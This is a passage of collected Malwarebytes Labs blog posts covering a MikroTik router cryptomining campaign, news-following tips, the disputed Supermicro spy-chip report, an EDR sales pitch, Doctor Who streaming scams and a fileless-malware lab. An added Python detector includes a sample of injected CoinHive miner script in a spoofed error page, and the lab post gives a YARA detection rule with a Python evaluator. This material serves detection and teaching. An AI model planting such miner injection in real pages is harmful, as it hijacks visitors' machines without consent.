Such a page is displayed to users whenever they try to view a URL to which access is denied. But the malicious script configures the router in such a way that basically any HTTP request leads to the error page. Yet, the error page is crafted to spoof the original traffic, displaying the requested page in an iframe. So, users may browse most of the web as usual, without noticing the change. Example:

The CoinHive miner is embedded in that page, so for the whole time users are browsing, their machines are used for mining.
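As an added example that is not part of the post, the following check looks for the two traits of the spoofed error page described above: an iframe that loads the originally requested URL, and a script referencing CoinHive. The sample HTML, the script host and the site key placeholder are constructed for this example.

```python
"""Flag a web-proxy response that looks like the spoofed RouterOS error page.

Added example, not code from the Malwarebytes post.
"""
from html.parser import HTMLParser

MINER_MARKER = "coinhive"   # substring looked for in script URLs and inline JS


class ErrorPageInspector(HTMLParser):
    """Collect iframe targets and script sources/bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # src of every <iframe>
        self.script_srcs = []      # src of every external <script>
        self.inline_js = []        # text of every inline <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append(a.get("src") or "")
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def inspect_proxy_response(requested_url, body):
    """Report which traits of the spoofed error page a response shows."""
    p = ErrorPageInspector()
    p.feed(body)
    p.close()
    # Trait 1: the page we asked for is re-displayed inside an iframe.
    spoof = any(src.startswith(requested_url) for src in p.iframes)
    # Trait 2: a miner is loaded, externally or inline.
    miner = (any(MINER_MARKER in s.lower() for s in p.script_srcs)
             or any(MINER_MARKER in js.lower() for js in p.inline_js))
    return {
        "iframe_to_requested_page": spoof,
        "miner_script": miner,
        "suspicious": spoof and miner,
    }


REQUESTED = "http://example.com/news"

# Constructed sample: what a victim would receive for any URL through the
# backdoored router.  Host name and site key are placeholders, not real values.
SPOOFED_ERROR_PAGE = """<html><body>
<script src="https://coinhive.example/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER'); m.start();</script>
<iframe src="http://example.com/news" style="width:100%;height:100%;border:0"></iframe>
</body></html>"""

# Constructed sample: an ordinary access-denied page from a clean proxy.
GENUINE_ERROR_PAGE = """<html><body>
<h1>403 Forbidden</h1><p>Access to http://example.com/news is denied.</p>
</body></html>"""

if __name__ == "__main__":
    print(inspect_proxy_response(REQUESTED, SPOOFED_ERROR_PAGE))
    print(inspect_proxy_response(REQUESTED, GENUINE_ERROR_PAGE))
```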


MikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. MikroTik’s download page explains how to perform an upgrade to RouterOS.

Awareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.

With this latest social engineering scheme, we saw how criminals are trying to infect regular users and leverage their computers to scan the Internet for vulnerable routers. This technique is clever because scanning the Internet at scale requires time and resources, and offloading that work onto victims’ machines supplies both.

Malwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:

Malwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.

Indicators of compromise

Sample hash


Coinhive site keys

oiKAGEslcNfjfgxTMrxKGMJvh436ypIM 5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx 5ROof564mEBQsYzCqee0M2LplLBEApCv qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf joy1MQSiGgGHos78FarfEGIuM5Ig7l8h ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma

The post Fake browser update seeks to compromise more MikroTik routers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

6 ways to keep up with cybersecurity without going crazy

Malwarebytes - Thu, 10/11/2018 - 15:00

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle makes it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use has led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to protect not only ourselves, but also our communities, countries, and the world by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or by making small talk with parents at your child’s school—cybersecurity is covered so much in the media now that it’s become fodder for mainstream chatter. Many will happily discuss more than just the latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meetups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach would be to simply keep your programs updated at all times so there’s no chance a cybercriminal can exploit the vulnerability and gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bloomberg blunder highlights supply chain risks

Malwarebytes - Wed, 10/10/2018 - 16:00

Ooh boy! Talk about a back-and-forth, he said, she said story!

No, we’re not talking about that Supreme Court nomination. Rather, we’re talking about Supermicro. Supermicro manufactures the type of computer hardware that is used by technology behemoths like Amazon and Apple, as well as government operations such as the Department of Defense and CIA facilities. And it was recently reported by Bloomberg that Chinese spies were able to infiltrate nearly 30 US companies by compromising Supermicro—and therefore our country’s technology supply chain.

If you’ve been trying to follow the story, it may feel a bit like this:

What do we know so far

On October 4, Bloomberg Businessweek detailed a narrative regarding Chinese government influence into the operations of US-based hardware manufacturer Super Micro Computer, Inc., or simply Supermicro. The article was produced using information from 17 different anonymous sources including “one from a Chinese foreign ministry,” and draws on research spanning more than three years of investigations.

The article alleges that operatives from a unit of the People’s Liberation Army used a method known as seeding to compromise the Supermicro supply chain. They did this by coercing Chinese-based subcontractors responsible for the creation of the hardware circuitry to secretly install a high-tech spying chip into the motherboards and systems of computers destined for high-profile customers.

Bloomberg suggests the access by top-level operatives allowed the Chinese government to conduct a highly-targeted and highly-complex spying operation against worldwide organizations and in all sectors of business, including finance, health, government, and private.

That little chip is what the Bloomberg article says is responsible.

According to the article, the problem stems from a tiny microchip, no bigger than a pencil tip, that had been embedded in the electronic circuitry of compromised devices. Though the intent of the microchip remains uncertain, the article suggests it was capable of communicating with anonymous computers on the Internet and loading new code into the device’s operating system.

In at least one case, the malicious microchips are alleged to be thin enough to be embedded between the layers of fiberglass onto which the other components were attached.

The malicious microchip can be embedded between layers of hardware fiberglass.

The chips are said to be able to modify the instructions passing between the operating system and CPU, allowing for code injection or other data-alteration techniques. The injected code also creates a stealth doorway into the networks of altered machines.

Or as Bloomberg put it:

The implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard. This happened at a crucial moment, as small bits of the operating system were being stored in the board’s temporary memory en route to the server’s central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

Talk about some deep-state, James Bond–level stuff.

Here, we have a story detailing illicit government operations and covert operatives who have systematically compromised the supply chain of one of the world’s largest motherboard and custom hardware manufacturers. Threat actors are said to have accomplished this using a deeply technical, highly targeted, and nearly undetectable hardware attack utilizing incredibly small, sophisticated microchips that are embedded between the individual hardware fiberglass layers.

And why did they do it? To initiate clandestine spying operations against some of the world’s largest entities in order to exfiltrate sensitive intellectual property and top-secret government information.

Quick, call a Hollywood director. I have a story to pitch!

This is indeed a fantastic story filled with all sorts of nail-biting suspense and adventure, but just like any good Hollywood caper, we have to ask ourselves: Is there any truth to it? We imagine that when storytellers got a whiff of this tale, they did something like this:

Did that really happen?

One problem with verifying this story is that this type of attack isn’t detectable by any security solution. Right now, no one can detect hardware-level modifications using custom hardware solutions that have been systematically installed at the manufacturer level. That kind of detection protocol just doesn’t exist yet.

Another problem: Aside from SOC-generated network logs pointing fingers at compromised machines and vulnerable networks—for which the article said there were none—no one can prove or disprove this story.

Few security researchers are going to have access to the $100,000+ computers where these chips are said to reside. And even fewer of those researchers work for organizations that will let them start analyzing and ripping capacitor-looking circuits from the board. So basically, we’re left having to trust the anonymous sources used for the report.

This state of unknown even led well-known Google security researcher Tavis Ormandy to liken the event to the chemtrails conspiracy theory and the hunt for Sasquatch.

In the days since Bloomberg’s publication of the story, there have been significant rebukes and outright denials from the companies and government agencies cited in the report. Here’s what’s been said:

  • Amazon called the information untrue and doubled down on the statement by saying it was also untrue it had worked with or provided information to the FBI regarding malicious hardware.
  • Apple said they had repeatedly and consistently refuted every aspect of Bloomberg’s story during pre-publication verification efforts, and refute virtually every aspect of the article now.
  • Supermicro denied most, if not all, aspects of the Bloomberg story.
  • China’s Ministry of Foreign Affairs indicated the government intrusion into the product supply chain would violate China’s commitment to the proposal of the 2011 International Code of Conduct for Information Security.
  • And the United States Department of Homeland Security said it had no reason to question denials by US technology companies (though this doesn’t really refute the claims).

To further muddle the information, the only two named technology experts have backpedaled their statements since publication.

Joe Grand, the hardware hacker cited in the article and founder of Grand Idea Studio, Inc., claimed in a recent Twitter post that his quote was given over a year ago and related only broadly to the story as ultimately published.

In a fascinating podcast on, Joe Fitzpatrick, founder of Hardware Security Resources, expressed concerns regarding the accuracy of the reporting, and claims his statements were taken out of context. In an email exchange provided by Fitzpatrick and read aloud on the podcast, Fitzpatrick expresses skepticism to Bloomberg reporters over the financial cost and scalability of the device.

“The whole setup doesn’t really make sense,” the email is quoted as saying. “It just doesn’t make sense to spend the time and money to do what you are describing. Are you sure that the person who did the analysis had actual hardware knowledge and understanding?” Fitzpatrick concludes, “I’m incredibly skeptical.”

So basically, all of the reporting on this story fell apart post-publication, and everyone involved has denied the aspects of the story. Oops!

Supply chain attacks are real

Even though Bloomberg may (or may not) have got the details wrong on this one, the scenario the story brings up is entirely plausible—though maybe not with the sensationalism portrayed in the article. In fact, supply chain compromises, hardware faults, and outright counterfeits are not at all uncommon. There have been numerous events across the globe that highlight the dangers that audit-free software and single points of failure can introduce.

Just last year, the popular Ukrainian tax software Medoc was subject to a compromised update that went out automatically to millions of customers. The attack resulted in the distribution of the EternalPetya ransomware.

Earlier this year, popular PC cleaner CCleaner was the victim of an advanced APT backdoor that came as part of a software supply chain attack. In this multi-pronged attack, threat actors infected 2.27 million users in the first stage. After analyzing the collected information for high-value targets, only 40 were chosen for second-stage attacks and additional espionage efforts. This type of concentrated effort shows the extent attackers are willing to go to infect high-value and potentially lucrative industries and organizations.

Let’s also not forget that Edward Snowden detailed an NSA program in which backdoors allegedly planted in Cisco products allowed for spying on 20 billion communications each day—or the allegations that the NSA compromised hard drive manufacturers from all over the world to install malware that remained undetected for as long as two decades. Or how Mark Klein detailed secret, unmarked rooms at AT&T from which covert spying operations were being run.

And this doesn’t even touch on the countless vulnerabilities, IoT botnets, default password attacks, or the many other vectors that can be used to launch malware toward systems, peripherals, routers, and other hardware devices we use on a daily basis.

Unfortunately, few of these devices or systems are covered by security solutions that can protect from or remediate the unwanted code and malicious behaviors.

But don’t be fooled. This doom and gloom isn’t just isolated to high-tech computer components and state-sponsored spying. Nor is the problem isolated to components originating from specific geographic regions.

Due to deep supply chains and razor-thin profit margins, consumers face risks every day when at the checkout counter. Consumables can be compromised, either knowingly or not, and with malicious intent or not, in any one of the many downstream transports. This relates to everything from cheap computers and phones purchased from third-party markets all the way down to pet food and lettuce that you buy from your local supermarket. Even the vehicle you drive may have faults attributable to supply-chain issues.

There have been millions of instances where food, phones, computers, manufacturing goods, and virtually every other product known to man have shipped with vulnerabilities or been susceptible to supply-chain tampering.

So what do we do?

Admittedly, that’s a tough nut to crack.

Few in the security industry possess the necessary skills to comprehend—let alone reverse engineer—malicious hardware components that are deliberately designed to look like obscure, legitimate hardware components and are hidden within pin-point modules. And do any of us have the time or desire to understand the inner workings of the devices and systems we purchase? Okay, perhaps a few do.

To make matters worse, there aren’t any security products on the market that have the capability to protect against the sort of sophisticated and targeted attack outlined in the Bloomberg report. To steal a quote from the article: “This stuff is at the cutting edge of the cutting edge, and there is no easy technological solution.”

Regardless of the device or the origin of the product, businesses and consumers alike need to perform due diligence when purchasing devices and products. The risk tolerance may need to be assessed to determine if a particular service or product is worth the potential detriment of losing sensitive information—or other valuable data, time, and peace of mind.

Businesses may wish to conduct hardware security audits on newly-acquired equipment to check for suspicious behavior. IT departments should also consider rolling out updates and patches in staggered succession to monitor for flaws or undesirable effects, thus isolating these problems to a few machines rather than the entire company. And, of course, adopting early technologies should be off-limits for security-conscious enterprises as these products have not yet received the scrutiny of the security community.

How can consumers and businesses truly protect themselves, then? The real answer is “they can’t.” Consumers can never be 100 percent assured the devices and software they buy will be completely harmless.

Without the ability to analyze and reverse-engineer every single device and bit of code that is used, customers have few fail-safe methodologies to ensure their products are free of defect. They must simply research, use common sense, and trust that they’re aligning themselves with products and companies that take the privacy and security of their customers seriously.

Aligning with security best practices, doing due diligence, and conducting a cost/benefit analysis are all good suggestions to follow. But also in this case, maybe crossing your fingers and saying a prayer is just as viable a suggestion.

The post Bloomberg blunder highlights supply chain risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When Endpoint Detection and Response (EDR) is not enough

Malwarebytes - Tue, 10/09/2018 - 15:00

As cybercriminals continue to validate the reality that no prevention-based security control is going to stop every threat every time, companies are expanding beyond prevention-only approaches and closing the gap with endpoint detection and response solutions.

But as we consider this strategy, one pressing question is: How big is the gap? If prevention security isn’t 100 percent effective, how effective is it? A popular perception among businesses is that prevention security is about 98 percent effective, with a mere 2 percent of threats slipping by. However, the reality is far worse.

Because our product is most often used for malware remediation on business endpoints, we have extensive telemetry on this gap where current endpoint protection technologies are failing to keep organizations safe. Our data shows that current endpoint protection platform vendor software is approximately 40 percent effective, based on endpoints using Malwarebytes for cleanup. That means 60 percent of those endpoints were found to be harboring hidden threats—including Trojans, backdoors, and rootkits.

Framing up the size of the gap is important because it helps organizations prioritize the capabilities they need in their endpoint detection and response (EDR) solution—namely, automated and complete remediation.

Until recently, organizations have turned to EDR to gain greater visibility into what’s happening on endpoints. While helpful and important, visibility doesn’t provide a silver-bullet solution for fast and effective remediation. Incident response (IR) teams still face challenges when managing multiple platforms, chasing false alerts, and manually handling the remediation process.

Lack of visibility into and quick remediation of threats leads to long infection dwell times. In fact, according to IR teams interviewed for the 2017 SANS Incident Response Survey, 28 percent report the time from detection to remediation is between 6 and 24 hours. The picture is much grimmer in the 2018 Verizon Data Breach Investigations Report, where more than 70 percent of organizations were compromised by a breach within minutes, but discovery of that breach took months for 60 percent of respondents. A further 30 percent took days to contain a breach after discovery, and a still solid 10 percent took additional months to get their breach under control.

In addition to dwell time, manual remediation itself is resource-intensive, often involving a lengthy re-imaging process for IR teams, and lots of lost productivity for employees—not to mention the tedious re-installation of end-user applications and customization of personal settings.

There’s a better way.

Breaches are inevitable, and the true size of the prevention gap is much bigger than many realize. As such, remediation capabilities are essential for today’s organizations. To truly close the gap and remediate hidden threats, the “response” portion of EDR solutions needs to go beyond alerting to actually fixing the endpoint.

And that’s what we aim to do with Malwarebytes Endpoint Protection and Response. Using a single, unified agent to deliver endpoint protection, detection, and response, our solution effectively alleviates expertise challenges and eliminates the resolution gap. Our product consists of three key components:

1. Prevent

Malwarebytes Endpoint Protection and Response uses a seven-layered, Multi-Vector Protection (MVP) approach, which includes both static and dynamic detection techniques, to seek out a wide range of threats delivered via different attack vectors.

2. Detect

Our solution provides continuous endpoint monitoring and visibility using machine learning anomaly detection combined with aggressive anomaly detection scoring, which is integrated with our cloud sandbox detonation.

3. Respond

Malwarebytes goes beyond alerting and actually fixes the problem with thorough remediation, and even rollback for ransomware infections. Our fast and effective response includes complete removal of infections and artifacts—all with minimized end-user impact.

The result is advanced protection capabilities plus EDR capabilities, packaged with not only visibility into threats but the ability to quickly remediate those threats and fix endpoints.

Malwarebytes isn’t like other security companies. With remediation in our DNA, we do everything in our power to stop attacks before they happen, but we never assume that cybercriminals won’t find a way. That’s why we’ve focused on being the best at finding and removing known and unknown threats.

Learn more about how to remediate threats with Malwarebytes Endpoint Protection and Response.

The post When Endpoint Detection and Response (EDR) is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Avoid these Doctor Who Series 11 scams

Malwarebytes - Mon, 10/08/2018 - 16:39

The new season of Doctor Who has finally landed on television screens around the world, and we’ve started to see the first few signs of spam and other assorted nonsense lumbering online.

A rash of YouTube accounts claiming to offer up the new series is making the rounds, all of which generally lead to the same final destination: a site that claims to offer free membership, but buries some real fees in the terms and conditions, which you will presumably have to pay to access the promised content.

If you go hunting for Doctor Who streams at the moment, you’re liable to see a bunch of results similar to the below, posted from multiple accounts. Here are a few advertising episode 1 of the latest series:

Here’s one doing the same thing, but with Peter Capaldi in the promo pic instead, and I can let them off with this, seeing as it’s Peter Capaldi.

All of them claim to offer up the upcoming Series 11 (even the ones using pictures from older series), but even from the outset, the videos should make you a little bit wary.

For starters, there are no preview clips of the content. Instead, the videos flash a blink-and-you’ll-miss-it promo shot of Doctor Who, which is immediately replaced by random upload content.

How random? Well, it’s everything from what sounds like mid-2000s pop music and video game streams to weird spinning graphics and pulsating lights. Essentially, absolutely nothing to do with Doctor Who and everything to do with a solid hour of cut-and-paste garbage, in a bid to evade YouTube copyright detection and/or pad out the video length. Even Love & Monsters didn’t drag on this long.

Depending on which spammy YouTube account you start from, you’ll either be given a direct link to one of the supposed Doctor Who content portals or a Bit(dot)ly link for a second site claiming to do the same thing.

From there, you’ll end up on one of a number of cookie-cutter identikit websites, which offer up more glimpses of the new Doctor with a play now button. Here’s one:

Wherever you’ve come from, clicking through the continue buttons pops a “Create free account” box. The shot below is from the other site, bestv(dot)online, at the same stage in the process. It may as well be the same website.

Note that although “Create free account” is prominent, it does say off to the side that you can “Try this service for free.” A lot of people might assume there’s no cost here, but trying a service for free generally tends to imply charges down the line, perhaps by having to upgrade an account to be able to access anything remotely worthwhile.

We’ve seen lots of websites that look like our final destination down the years; many claim to offer free books, games, videos, and more. Search for the site names online though, and you’ll often find disgruntled users complaining that after joining, they were simply given lists of third-party download sites to try, or links to pirated content like this author claims in the top comment, or (occasionally) not even that.

This one, called “Basilplay,” follows a similar design format for the template if nothing else with liberal splashings of the word “free” all about the place. “Free and unlimited games, books, movies, and more.” “Sign up for free.” “Please create a free account to access unlimited downloads and streaming.”

That all sounds very, well, free. Doesn’t it?

If you check the inevitable T&Cs, however, things become a little unclear. They state that there’s a “standard” account that doesn’t cost any money (they still want some payment information at time of registration either way), and a “premium” account, which gives full access to whatever content they claim to be offering. There’s nothing on site that shows the specifics of what you get versus what you don’t get for paying, so you’re effectively signing up with zero idea of what’s on the other side.

The premium rolling subscription, according to the T&Cs, is $89.95 a month. Not so much Doctor Who, as Doctor Whoo-boy. For that sort of money I’d also want to know who said “Silence will fall” in the TARDIS.

A few of the landing pages seem to rotate between sites, so you might end up on Basilplay, or you could find yourself materialising on a similar site located elsewhere:

Curiously, we revisited the Basilplay site while putting together this blog, and it seems to have taken on a Time Lord–style regeneration of its own:

I’m not sure where Doctor Who series 11 has gone, but I don’t think we’re going to be seeing humorous references to reversing the polarity of the neutron flow on a site suddenly all about video games, do you?

Doctor Who has long been a global brand, and it’s frankly never been easier to catch it on any number of mainstream, legal channels, including purchasing DVDs, streaming, or just watching it live. In fact, you could really get into the swing of things and Timeshift, which seems highly appropriate.

However you do it, you don’t need to bother with spammy YouTube videos, clickthrough portals, or landing pages that offer books and TV shows one day, but focus on video games the next.

Now that the new series is up and running, you can expect a lot more antics similar to the above across many corners of the Internet. As always, if it seems too good to be true, then do yourself a favour and jump back into the TARDIS. A crack in time is bad enough, but a crack in your bank balance is even worse. 

The post Avoid these Doctor Who Series 11 scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 1 – 7)

Malwarebytes - Mon, 10/08/2018 - 16:31

Last week, Malwarebytes welcomed National Cybersecurity Awareness Month by renewing our pledge to do what we do best: offer the best protection for our customers and promote security awareness for all.

On Labs, we raised the question of whether it is a good idea to bring your own security or not, talked a little bit more about fileless malware, homed in on a malware campaign targeting Fortnite gamers, and looked into LoJack, a bootkit malware that has been targeting government entities.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 1 – 7) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fileless malware: part deux

Malwarebytes - Fri, 10/05/2018 - 15:00

In part one of this series, we focused on an introduction to the concept of fileless malware, providing examples of the problems that we in the security industry face when dealing with these types of attacks.

In part two, I will be walking through a few demonstrations of fileless malware attacks that I have created. These labs demonstrate the problems we face when trying to detect fileless malware.

I will first start off with a demonstration of malware that is detected strictly with static signatures. The file I will be using is a custom binary, which I created from scratch and does not actually perform malicious activities. It is completely benign.

The reason for using a benign file for the demo is that I do not want any of the other more advanced components of the AV to kick in and try to detect this file. I want to show what happens when we rely purely on static signatures. We have simply created a static signature for this specific binary so that when executed or scanned on any computer running Malwarebytes, it will be detected.

After this test, I will run a real malware sample via the same fileless methods to illustrate the detection technology that needs to be in place to catch the threat.

Before we begin, I will first cover how static detections work in order to make clear what exactly is being evaded with these fileless methods. Then I will cover some more sophisticated detection methods, which in this modern age of security are the most important components to detect the new and unknown threats.

Static detection

There are a few ways to detect malware statically. The most basic, and frankly the most useless, detection method nowadays is hashing the file: one signature covers exactly one file, so every recompiled or repacked variant needs a new signature.

In order to have a single signature cover a lot more ground, modern-day static detection engines extract key areas of the binary and allow signatures to be written against specific opcodes or strings within sections of the binary. The best open-source example of this is YARA rules. If you are unfamiliar with YARA, please take a minute to look it up, as it is a valuable tool for malware analysis.

Below is an example of a detection using YARA. The example rule is completely random and not made to detect any malware.

    rule ExampleDetection
    {
        strings:
            $hex_string = { AA (BB | CC) [3] FF [2-4] 00 }
            $string1 = "malString" wide ascii fullword
            $hex2 = { CC DD 33 DD }

        condition:
            $hex_string and #string1 > 3 and $hex2 at entrypoint and filesize > 200KB
    }

A single rule similar to this, although still in the category of static signatures, can detect hundreds or thousands of malware samples that share these characteristics. A good static signature still gives you some flexibility, detecting the malware even when its author modifies the code.

But even though these static detection methods are quite effective in certain cases, there are a few major downfalls. The first and most obvious is that if the binary code and strings are changed beyond what the signature writer took into consideration, the detection will no longer trigger. This is the main reason why antivirus vendors have added more dynamic methods for detecting sophisticated malware to their solutions: behavioral signatures, behavioral detections, heuristics, self-contained emulators, machine learning, and artificial intelligence.
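To make concrete what such a rule buys you and where it stops, here is an added example in Python. It is my code as editor, not code from the original post or from the YARA project. It translates the hex string and the counted text string of ExampleDetection into byte regexes and evaluates the rule’s condition against three constructed samples (not real malware): the bytes the signature writer saw, a variant that stays inside the alternatives and jumps the rule allows, and a variant with one byte changed beyond them. The translator, the sample builder and the entry point offset supplied by the caller (a real engine would derive it from the PE headers) are all assumptions of this example.

```python
import re


def hex_pattern_to_regex(pattern: str) -> "re.Pattern":
    """Translate a YARA-style hex string into a compiled bytes regex.

    Handles literal bytes, '??' wildcards, alternatives '( .. | .. )' and
    jumps '[n]' / '[n-m]'. Nibble wildcards such as 'A?' are not handled.
    """
    tokens = re.findall(r"\[\d+(?:-\d+)?\]|\(|\)|\||\?\?|[0-9A-Fa-f]{2}", pattern)
    parts = []
    for tok in tokens:
        if tok == "(":
            parts.append("(?:")
        elif tok in (")", "|"):
            parts.append(tok)
        elif tok == "??":
            parts.append(".")
        elif tok.startswith("["):
            lo, _, hi = tok[1:-1].partition("-")
            parts.append(".{%s,%s}" % (lo, hi or lo))
        else:
            parts.append("\\x%02x" % int(tok, 16))
    # DOTALL so '.' also matches 0x0A; latin-1 keeps one character per byte.
    return re.compile("".join(parts).encode("latin-1"), re.DOTALL)


def count_string(data: bytes, s: str, wide: bool = True, ascii: bool = True,
                 fullword: bool = True) -> int:
    """Count occurrences the way YARA's '#name' does for the given modifiers."""
    total = 0
    if ascii:
        pat = re.escape(s.encode("ascii"))
        if fullword:  # must not be glued to an alphanumeric neighbour
            pat = rb"(?<![A-Za-z0-9])" + pat + rb"(?![A-Za-z0-9])"
        total += len(re.findall(pat, data))
    if wide:
        pat = re.escape(s.encode("utf-16-le"))
        if fullword:  # neighbour tested as a UTF-16LE code unit (approximation)
            pat = rb"(?<![A-Za-z0-9]\x00)" + pat + rb"(?![A-Za-z0-9]\x00)"
        total += len(re.findall(pat, data))
    return total


# The strings section of the ExampleDetection rule, compiled once.
HEX_STRING = hex_pattern_to_regex("AA (BB | CC) [3] FF [2-4] 00")
HEX2 = hex_pattern_to_regex("CC DD 33 DD")


def match_example_rule(data: bytes, entrypoint: int) -> dict:
    """Evaluate each term of the rule's condition plus the overall verdict.

    entrypoint is the file offset the PE entry point maps to; a real engine
    derives it from the PE headers, here the caller supplies it (assumption).
    """
    terms = {
        "hex_string": HEX_STRING.search(data) is not None,
        "string1_count_gt_3": count_string(data, "malString") > 3,
        "hex2_at_entrypoint": HEX2.match(data, entrypoint) is not None,
        "filesize_gt_200KB": len(data) > 200 * 1024,
    }
    terms["match"] = all(terms.values())
    return terms


# Constructed samples (not real malware): 200KB of padding, then a body whose
# first bytes play the role of the code at the entry point.
PAD = b"\x00" * (200 * 1024)
ENTRYPOINT = len(PAD)


def build_sample(second_byte: bytes, jump: bytes) -> bytes:
    body = (bytes.fromhex("CC DD 33 DD")                                    # $hex2 at the entry point
            + b"\xAA" + second_byte + b"\x01\x02\x03\xFF" + jump + b"\x00"  # $hex_string region
            + b"\x00malString\x00" * 4)                                      # four full-word $string1 hits
    return PAD + body


SAMPLE_ORIGINAL = build_sample(b"\xBB", b"\x10\x20\x30")  # what the signature writer saw
SAMPLE_VARIANT = build_sample(b"\xCC", b"\x10\x20")       # still inside the alternatives/jumps
SAMPLE_REPACKED = build_sample(b"\xDD", b"\x10\x20\x30")  # one byte outside the rule's reach

if __name__ == "__main__":
    for name, sample in [("original", SAMPLE_ORIGINAL), ("variant", SAMPLE_VARIANT),
                         ("repacked", SAMPLE_REPACKED)]:
        print(name, match_example_rule(sample, ENTRYPOINT))
```

Run it and the first two samples match, while the third fails only on $hex_string: the other three terms still hold, which is exactly the situation where a signature writer has to go back and widen the pattern, and the gap that dynamic detection is meant to cover.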

